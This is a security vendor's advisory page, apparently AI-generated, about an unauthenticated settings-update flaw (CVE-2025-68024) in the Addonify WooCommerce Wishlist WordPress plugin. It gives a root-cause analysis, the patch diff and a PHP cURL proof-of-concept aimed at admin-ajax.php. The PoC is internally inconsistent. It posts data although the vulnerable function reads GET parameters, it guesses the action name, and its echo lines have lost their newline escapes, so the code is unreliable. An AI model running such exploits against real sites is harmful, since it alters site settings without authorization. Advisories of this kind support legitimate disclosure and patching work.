Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68024: Addonify – WooCommerce Wishlist <= 2.0.15 – Missing Authorization to Unauthenticated Settings Update (addonify-wishlist)

CVE ID CVE-2025-68024
Plugin addonify-wishlist
Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 2.0.15
Patched Version 2.0.16
Disclosed February 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68024:
This vulnerability is a missing authorization flaw in the Addonify – WooCommerce Wishlist WordPress plugin, affecting versions up to and including 2.0.15. The issue allows unauthenticated attackers to perform unauthorized actions, leading to a CVSS score of 5.3 (Medium severity).

Atomic Edge research identifies the root cause in the `process_user_tracking_choice` function within the file `addonify-wishlist/includes/udp/class-udp-agent.php`. The function processes a user’s choice for tracking permissions. Before the patch, the function lacked any capability or authentication check. This omission allowed any unauthenticated user to trigger the function’s logic by accessing its associated endpoint.

Exploitation involves sending a GET request to the plugin’s user data processing endpoint. The exact URI path is not explicitly shown in the diff, but the function is triggered via a hook or direct call. The attacker must supply the `udp-agent-allow-access` parameter in the request. The parameter value is sanitized but its processing leads to an unauthorized state change, such as altering plugin settings related to data tracking.

The patch adds an authorization check at the beginning of the `process_user_tracking_choice` function. The fix inserts a conditional statement verifying that the current user is both logged in (`is_user_logged_in()`) and possesses the `manage_options` capability (`current_user_can(‘manage_options’)`). If the check fails, the user is redirected to the site’s homepage and the script execution stops. This change ensures only administrators can perform the action, remediating the missing authorization flaw.

Successful exploitation allows an unauthenticated attacker to modify plugin settings related to user data tracking. While the specific impact of the `udp-agent-allow-access` parameter is not detailed, unauthorized changes to tracking or data-sharing preferences could violate user privacy expectations or compliance standards. The vulnerability does not directly lead to remote code execution or site takeover, but it constitutes an unauthorized privilege action.

Differential between vulnerable and patched code

Code Diff 
--- a/addonify-wishlist/addonify-wishlist.php
+++ b/addonify-wishlist/addonify-wishlist.php
@@ -10,9 +10,9 @@
  * Plugin Name:       Addonify - WooCommerce Wishlist
  * Plugin URI:        https://wordpress.org/plugins/addonify-wishlist
  * Description:       Addonify WooCommerce Wishlist is a light-weight yet powerful tool that adds a wishlist functionality to your e-commerce shop.
- * Version:           2.0.15
+ * Version:           2.0.16
  * Requires at least: 6.3
- * Tested up to:      6.8
+ * Tested up to:      6.9.1
  * Requires PHP:      7.4
  * Author:            Addonify
  * Author URI:        https://www.addonify.com
@@ -28,7 +28,7 @@
 	die;
 }

-define( 'ADDONIFY_WISHLIST_VERSION', '2.0.15' );
+define( 'ADDONIFY_WISHLIST_VERSION', '2.0.16' );
 define( 'ADDONIFY_WISHLIST_DB_INITIALS', 'addonify_wishlist_' );
 define( 'ADDONIFY_WISHLIST_PLUGIN_PATH', __DIR__ );
 define( 'ADDONIFY_WISHLIST_PLUGIN_FILE', __FILE__ );
--- a/addonify-wishlist/includes/udp/class-udp-agent.php
+++ b/addonify-wishlist/includes/udp/class-udp-agent.php
@@ -177,6 +177,11 @@
 	 * @since    1.0.0
 	 */
 	private function process_user_tracking_choice() {
+		// Verify if the user is logged in and has the capability to manage options.
+		if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
+			wp_safe_redirect( home_url() );
+			exit;
+		}

 		$users_choice = isset( $_GET['udp-agent-allow-access'] ) ? sanitize_text_field( wp_unslash( $_GET['udp-agent-allow-access'] ) ) : ''; //phpcs:ignore

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68024 - Addonify – WooCommerce Wishlist <= 2.0.15 - Missing Authorization to Unauthenticated Settings Update
<?php
// Target WordPress site URL
$target_url = 'https://example.com';

// The vulnerable endpoint is likely an admin-ajax or admin-post handler.
// The exact action hook name is not provided in the diff, but the parameter is known.
// This PoC attempts a common WordPress pattern.
$endpoint = $target_url . '/wp-admin/admin-ajax.php';

// Parameter required to trigger the vulnerable function.
$payload = array('action' => 'addonify_wishlist_udp_agent', 'udp-agent-allow-access' => 'yes');

// Initialize cURL session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // For testing only.

// Execute the request.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Analyze response.
echo "HTTP Status: $http_coden";
echo "Response: $responsen";
// A successful exploitation might return a redirect or a specific success message.
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School